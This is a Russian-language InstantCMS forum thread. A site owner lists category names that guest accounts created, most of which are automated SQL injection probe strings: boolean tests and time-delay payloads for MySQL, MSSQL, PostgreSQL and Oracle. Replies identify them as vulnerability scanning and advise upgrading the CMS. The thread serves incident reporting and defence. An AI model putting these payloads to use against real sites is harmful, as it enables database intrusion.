Много категорий типа Mr. и др.

Стоит ли беспокоится?

#1 5 августа 2024 в 22:16

каждая строка это категория в типе контента.

  1. -1 OR 2+855-855-1=0+0+0+1 --
  2. -1 OR 3+855-855-1=0+0+0+1 --
  3. -1 OR 2+147-147-1=0+0+0+1
  4. -1 OR 3+147-147-1=0+0+0+1
  5. -1 OR 3*2
  6. Mr.
  7. -1 OR 3*2>(0+5+147-147)
  8. -1\' OR 2+981-981-1=0+0+0+1 --
  9. -1\' OR 3+981-981-1=0+0+0+1 --
  10. -1\' OR 2+904-904-1=0+0+0+1 or \'MYuIeOEN\'=\'
  11. -1\' OR 3+904-904-1=0+0+0+1 or \'MYuIeOEN\'=\'
  12. -1\" OR 2+555-555-1=0+0+0+1 --
  13. -1\" OR 3+555-555-1=0+0+0+1 --
  14. Mr.
  15. if(now()=sysdate(),sleep(15),0)
  16. Mr.
  17. 0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z
  18. Mr.
  19. 0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z
  20. Mr.
  21. (select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/
  22. Mr.
  23. 1 waitfor delay \'0:0:15\' --
  24. Mr.
  25. Mr.
  26. Mr.
  27. Mr.
  28. AjuVsul7\'; waitfor delay \'0:0:15\' --
  29. Mr.
  30. 06zm366K\' OR 375=(SELECT 375 FROM PG_SLEEP(15))--
  31. Mr.
  32. -1 OR 2+585-585-1=0+0+0+1 --
  33. -1 OR 2+405-405-1=0+0+0+1
  34. -1\' OR 2+638-638-1=0+0+0+1 --
  35. 2mb94AJ9\') OR 103=(SELECT 103 FROM PG_SLEEP(15))--
  36. -1\' OR 2+873-873-1=0+0+0+1 or \'g7dxtmIH\'=\'
  37. -1\" OR 2+36-36-1=0+0+0+1 --
  38. I1fX7Isk\')) OR 552=(SELECT 552 FROM PG_SLEEP(15))--
  39. if(now()=sysdate(),sleep(15),0)
  40. Mr.\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'
  41. 1\'\"
  42. 1
  43. 0\'XOR(if(now()=sysdate(),sleep(15),0))XOR\'Z
  44. @@XLB2I
  45. 0\"XOR(if(now()=sysdate(),sleep(15),0))XOR\"Z
  46. (select(0)from(select(sleep(15)))v)/*\'+(select(0)from(select(sleep(15)))v)+\'\"+(select(0)from(select(sleep(15)))v)+\"*/
  47. 1 waitfor delay \'0:0:15\' --
  48. jjIRapTE\'; waitfor delay \'0:0:15\' --
  49. uzfqslgs\' OR 75=(SELECT 75 FROM PG_SLEEP(15))--
  50. 35N25zWZ\') OR 322=(SELECT 322 FROM PG_SLEEP(15))--
  51. 4v8xaMUP\')) OR 100=(SELECT 100 FROM PG_SLEEP(15))--
  52. Mr.\'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||\'
  53. 1\'\"
  54.  

Версия инстанта 2.12.2, версия php 7.1.33

Ребята подскажите пожалуйста, стоит беспокоится?

В доступах было разрешение создавать категории, сейчас убрал.

Периодически появляются «гости» которые создают спамный контент и отправляют на модерацию. Я сразу таких баню и контент удаляю без публикации, но это было максимум раз 10-20, а тут зашёл в админку в контент и охренел от количества категорий. В примере только часть. больше всего категорий Mr.

#2 5 августа 2024 в 23:18

Ищут уязвимость, хотят взломать 

#3 6 августа 2024 в 21:56

 My-InstantCMS.Ru, да это понятно. Хотел узнать стоит ли беспокоится в связи с уже вроде как старенькой версией инстанта и php.

#4 6 августа 2024 в 22:35

 fincheck, Обновите хотя бы инстант

#5 6 августа 2024 в 23:02

 fincheck, надо обновляться

#6 7 августа 2024 в 11:14

 My-InstantCMS.RuLoadырь, Я бы с радостью, но боюсь просто и по маслу это не пройдёт, уж больно много там внедрено/вживлено)). Вам легко рассуждать, вы разработчики и в случае чего быстро всё полечите. 

#7 7 августа 2024 в 11:29

но боюсь просто и по маслу это не пройдёт, уж больно много там внедрено/вживлено))

fincheck

Мы это понимаем, но в 2.16.1 instantcms.ru/novosti/release2161.html благодаря huntr.dev было многое проверено и исправлено в плане безопасности движка. И вы можете сделать вручную те же правки в файлах и базе данных, что от версии к версии вносились в коммитах на гите. Это будет долгий и тернистый путь, но в этом случае ваши внедрения/вживления останутся с вами и возможно даже будут работоспособными.

А если и это для вас непосильная задача, то не парьтесь — тут беспокоиться уже не о чем ))).

Вы не можете отвечать в этой теме.
Войдите или зарегистрируйтесь, чтобы писать на форуме.
Используя этот сайт, вы соглашаетесь с тем, что мы используем файлы cookie.